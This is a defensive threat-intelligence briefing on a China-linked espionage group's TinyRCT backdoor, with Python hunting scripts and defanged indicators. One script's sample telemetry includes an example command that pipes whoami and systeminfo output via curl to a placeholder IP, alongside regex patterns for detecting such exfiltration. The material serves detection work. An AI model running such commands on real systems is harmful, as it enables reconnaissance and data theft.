A Chinese-speaking espionage crew has spent much of the past year burrowing into government bodies and state-owned energy companies across Southeast Asia, and researchers at Palo Alto Networks' Unit 42 say they have caught the group deploying a custom, previously undocumented backdoor they call TinyRCT.
Unit 42 tracks the activity as CL-STA-1062 and assesses with high confidence that it is the same cluster Cisco Talos reported as UAT-7237, which earlier hit web hosting infrastructure in Taiwan. The operators have been active since at least March 2022, and between October and December 2025 alone the team observed the likely compromise of at least ten organizations in the region.
Who is affected
The targeting is strategic. In September 2025 the attackers breached a Southeast Asian government entity, planted web shells and quietly exfiltrated database records and even an entire directory of web server source code, then used that foothold to scout a second government body in the same country. Months later they moved into two state-owned critical energy infrastructure operators, the kind of intrusion that hands a foreign intelligence service insight into, or a potential lever over, a country's power supply. For context on China-linked operators working the same region, see our coverage of Mustang Panda's multi-year Southeast Asian government espionage and a decade-long China-linked intrusion into a critical network.
How the attack works
Intrusions typically start with the attackers exploiting an exposed web application to drop an ASPX web shell, which becomes their command hub for running commands and pulling in more tools. They lean heavily on off-the-shelf software, using SoftEther VPN, VNT and yuze as tunnels to move through networks and smuggle data out, often renaming the binaries to look like VMware components or an EDR agent. Mimikatz harvests credentials, JuicyPotato escalates privileges by abusing the impersonation privileges that service accounts such as the one running the web server typically hold, and stolen files are bundled into password-protected RAR archives before being shipped to attacker-controlled servers.
The bespoke piece is TinyRCT, a lightweight remote access trojan written in C#. Unit 42 found it after spotting a suspicious file named PerfWatson2.exe, a name borrowed from a legitimate Visual Studio component, sitting on the group's infrastructure. The malware arrives inside a booby-trapped archive (chrome_setup.zip) that abuses the .NET AppDomainManager mechanism, a technique usually called AppDomainManager injection: a configuration file placed beside a signed, legitimate .NET installer tells the runtime to load an attacker-supplied assembly as the AppDomainManager, so the malicious code runs inside the trusted process before the installer's own entry point. A loader then fetches the backdoor and registers a scheduled task so it relaunches at every login.
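Because the hijack lives in a side-by-side .exe.config (or in two environment variables) rather than in the signed binary, it is cheap to hunt for on a host or in a file share. The following is an added example, not Unit 42's tooling and not code from the report: it parses any .exe.config in a directory for the runtime elements .NET consults (appDomainManagerAssembly and appDomainManagerType), reports which DLL the host would load, and also checks for the equivalent APPDOMAIN_MANAGER_ASM / APPDOMAIN_MANAGER_TYPE environment variables. The demo directory, the file names setup.exe and Updater.dll, and the type name Updater.Manager are constructed for illustration and are not indicators from the report.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# .NET reads these two <runtime> elements (or the matching environment
# variables) to decide which assembly to load as the AppDomainManager
# before the host program's own Main() runs.
CONFIG_KEYS = ("appDomainManagerAssembly", "appDomainManagerType")
ENV_KEYS = ("APPDOMAIN_MANAGER_ASM", "APPDOMAIN_MANAGER_TYPE")


def _local(tag):
    # Strip any XML namespace so matching does not depend on xmlns noise.
    return tag.rsplit("}", 1)[-1]


def inspect_config(config_path):
    """Return the AppDomainManager settings declared in a .exe.config, or {}."""
    found = {}
    try:
        root = ET.parse(config_path).getroot()
    except ET.ParseError:
        return found
    for runtime in root.iter():
        if _local(runtime.tag) != "runtime":
            continue
        for child in runtime:
            name = _local(child.tag)
            if name in CONFIG_KEYS:
                found[name] = child.get("value", "")
    return found


def hunt_appdomainmanager(directory, environ=None):
    """Flag executables whose side-by-side config names an AppDomainManager.

    Each finding names the host exe, the assembly and type it will load, and
    whether a DLL with that assembly name sits beside the host.
    """
    environ = os.environ if environ is None else environ
    findings = []
    for entry in sorted(os.listdir(directory)):
        if not entry.lower().endswith(".exe.config"):
            continue
        settings = inspect_config(os.path.join(directory, entry))
        if not settings:
            continue
        host_exe = entry[: -len(".config")]
        # The display name's first comma-separated element is the assembly
        # name; the loader probes for <name>.dll next to the host binary.
        asm = settings.get("appDomainManagerAssembly", "").split(",")[0].strip()
        dll_present = os.path.exists(os.path.join(directory, asm + ".dll"))
        findings.append({
            "host": host_exe,
            "assembly": asm,
            "type": settings.get("appDomainManagerType", ""),
            "dll_beside_host": dll_present,
        })
    # The same hijack can be staged purely through the environment.
    env_hit = {k: environ[k] for k in ENV_KEYS if k in environ}
    if env_hit:
        findings.append({"host": "<environment>", **env_hit})
    return findings


def demo(environ=None):
    """Build a constructed lure directory and run the hunt over it."""
    d = tempfile.mkdtemp()
    # Constructed stand-ins for a signed installer and its planted config;
    # names are illustrative and not taken from the report.
    open(os.path.join(d, "setup.exe"), "wb").close()
    open(os.path.join(d, "Updater.dll"), "wb").close()
    with open(os.path.join(d, "setup.exe.config"), "w", encoding="utf-8") as f:
        f.write(
            '<?xml version="1.0"?>\n<configuration>\n  <runtime>\n'
            '    <appDomainManagerAssembly value="Updater, Version=1.0.0.0, '
            'Culture=neutral, PublicKeyToken=null" />\n'
            '    <appDomainManagerType value="Updater.Manager" />\n'
            '  </runtime>\n</configuration>\n'
        )
    return hunt_appdomainmanager(d, environ={} if environ is None else environ)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

A config that names an AppDomainManager is rare outside developer tooling, so every hit deserves a look; the DLL check matters because the assembly may also be fetched from the GAC or a probing path, and a missing DLL beside the host does not clear the finding.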
TinyRCT itself is built for quiet surveillance. It encrypts its traffic with a hard-coded AES-128 key, beacons to its server roughly every ten seconds, and supports shell command execution, file listing and theft, screen capture, and a self-destruct routine that wipes the malware and its scheduled task to erase evidence. It also refuses to run unless it is launched from the user's AppData folder, a simple check that trips up sandboxes and analysts who execute the sample from anywhere else. Tellingly, the code contains a comment written in Simplified Chinese.
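With the payload encrypted under a key the defender does not have, the observable on the wire is the cadence rather than the content. The following is an added example, not code from Unit 42 or the report: it groups outbound connections by source and destination and flags pairs whose inter-arrival gaps are both frequent and tightly clustered, which is what a ten-second beacon looks like in flow or proxy logs. The flow records are constructed, the host name ws-17 is invented, and both destination addresses are RFC 5737 documentation ranges rather than the report's indicators.

```python
from collections import defaultdict
from statistics import median

# Constructed outbound-connection records: (timestamp in seconds, source host,
# destination IP). The regular ~10 s series to 203.0.113.10 imitates the
# beacon cadence described above; the irregular series to 198.51.100.7
# stands in for ordinary browsing. Neither address comes from the report.
SAMPLE_FLOWS = [
    (0.0, "ws-17", "203.0.113.10"), (10.2, "ws-17", "203.0.113.10"),
    (19.9, "ws-17", "203.0.113.10"), (30.1, "ws-17", "203.0.113.10"),
    (40.0, "ws-17", "203.0.113.10"), (50.3, "ws-17", "203.0.113.10"),
    (59.8, "ws-17", "203.0.113.10"), (70.1, "ws-17", "203.0.113.10"),
    (3.0, "ws-17", "198.51.100.7"), (4.0, "ws-17", "198.51.100.7"),
    (4.5, "ws-17", "198.51.100.7"), (60.0, "ws-17", "198.51.100.7"),
    (61.0, "ws-17", "198.51.100.7"), (300.0, "ws-17", "198.51.100.7"),
    (305.0, "ws-17", "198.51.100.7"),
]


def beacon_candidates(flows, min_connections=6, max_jitter=0.25):
    """Return {(src, dst): median_gap_seconds} for pairs that beacon regularly.

    A pair qualifies when it has at least min_connections connections and the
    median absolute deviation of its inter-arrival gaps, relative to the
    median gap, is at most max_jitter. The MAD is used instead of standard
    deviation so a single long outage does not mask an otherwise steady beat.
    """
    by_pair = defaultdict(list)
    for ts, src, dst in flows:
        by_pair[(src, dst)].append(ts)
    hits = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        gaps = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        med = median(gaps)
        if med <= 0:
            continue
        mad = median(abs(g - med) for g in gaps)
        if mad / med <= max_jitter:
            hits[pair] = round(med, 1)
    return hits


if __name__ == "__main__":
    for (src, dst), interval in beacon_candidates(SAMPLE_FLOWS).items():
        print(f"{src} -> {dst}: connects every ~{interval}s")
```

Run over real flow or proxy data, legitimate agents (update checkers, monitoring, the EDR itself) will also score as regular; the value is in the short list that remains after known-good destinations are removed, especially where the destination is a bare IP the organization has no business with.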
What you should do
There is no patch here, because this is intrusion tradecraft rather than a single bug, although keeping internet-facing web applications patched and watching them for web shell drops closes the entry point this group relies on. Unit 42 recommends strict behavioral monitoring and execution restrictions on untrusted binaries, which it says blocked TinyRCT in testing. Defenders should hunt for VPN or tunneling tools masquerading as system files, suspicious scheduled tasks using GoogleUpdater-style names, and curl-based system enumeration beaconing out to unfamiliar IP addresses.
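The three hunts above share one idea: a familiar name in an unfamiliar place. The following is an added example, not Unit 42's detection content and not code from the report: it runs those hunts over a handful of constructed telemetry records (scheduled tasks, running processes and command lines). The task name GoogleUpdaterTaskUser, the user alice, the Users\Public path and the 203.0.113.10 address are invented for the sample; the name-stem list is an assumption to be replaced with the VMware, updater and EDR binary names actually deployed in your estate.

```python
import re

# Locations a vendor component or updater would normally live in; a binary
# claiming such a name from anywhere else is worth a second look.
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")

# Name stems the report says the group borrows (VMware components, an EDR
# agent, GoogleUpdater-style task names). This list is an assumption; add
# the binary names of the EDR and agents you actually run.
MASQUERADE = re.compile(r"(vmware|vmtools|googleupdat)", re.I)

# curl reaching straight for a bare IPv4 address rather than a hostname.
CURL_TO_IP = re.compile(r"\bcurl(?:\.exe)?\b.*?\bhttps?://(\d{1,3}(?:\.\d{1,3}){3})", re.I)

# Enumeration commands commonly piped into such a beacon.
ENUM_CMDS = re.compile(r"\b(whoami|systeminfo|ipconfig|tasklist|net\s+user)\b", re.I)

# Constructed telemetry; none of these values are indicators from the report.
SAMPLE_RECORDS = [
    {"kind": "task", "name": "GoogleUpdaterTaskUser",
     "action": "C:\\Users\\alice\\AppData\\Roaming\\PerfWatson2.exe"},
    {"kind": "task", "name": "GoogleUpdateTaskMachineCore",
     "action": "C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe"},
    {"kind": "process", "image": "vmtoolsd.exe",
     "path": "C:\\Users\\Public\\vmtoolsd.exe"},
    {"kind": "process", "image": "vmtoolsd.exe",
     "path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe"},
    {"kind": "cmdline",
     "cmd": "cmd.exe /c whoami & systeminfo | curl -X POST http://203.0.113.10:8080/up -d @-"},
    {"kind": "cmdline", "cmd": "curl https://packages.example.com/index.json"},
]


def _outside_trusted(path):
    p = path.lower().replace("/", "\\")
    return not p.startswith(TRUSTED_ROOTS)


def hunt(records, known_good_ips=frozenset()):
    """Apply the three hunts and return (rule, identifier) findings.

    Each record is a dict with a "kind" of "task", "process" or "cmdline".
    """
    findings = []
    for r in records:
        if r["kind"] == "task":
            # A vendor-looking task name whose action runs from a user-writable
            # path is the persistence pattern described in the report.
            if MASQUERADE.search(r["name"]) and _outside_trusted(r["action"]):
                findings.append(("masquerading_task", r["name"]))
        elif r["kind"] == "process":
            if MASQUERADE.search(r["image"]) and _outside_trusted(r["path"]):
                findings.append(("masquerading_binary", r["path"]))
        elif r["kind"] == "cmdline":
            m = CURL_TO_IP.search(r["cmd"])
            if m and m.group(1) not in known_good_ips:
                rule = "curl_enum_beacon" if ENUM_CMDS.search(r["cmd"]) else "curl_to_ip"
                findings.append((rule, m.group(1)))
    return findings


if __name__ == "__main__":
    for rule, ident in hunt(SAMPLE_RECORDS):
        print(f"{rule}: {ident}")
```

The path check is deliberately coarse: the point is to separate the legitimate GoogleUpdate task under Program Files from a lookalike launched out of AppData, which is also the only location TinyRCT will run from. Feed it exported scheduled-task, process-list and command-line records from your own telemetry and pass the addresses of sanctioned curl targets in known_good_ips.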
Indicators of compromise
Key defanged indicators from the report: the staging and download server 139[.]180[.]134[.]221, the TinyRCT command server at 45[.]32[.]113[.]172, and additional C2 hosts 202[.]182[.]102[.]5 and 45[.]76[.]210[.]43. The TinyRCT payload carries SHA256 4e1f8888d020decd09799ec946f1bf677cac6612b24582ddbf4d8ede425d8384, and the initial chrome_setup.zip lure is 00e09754526d0fe836ba27e3144ae161b0ecd3774abec5560504a16a67f0087c.
This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.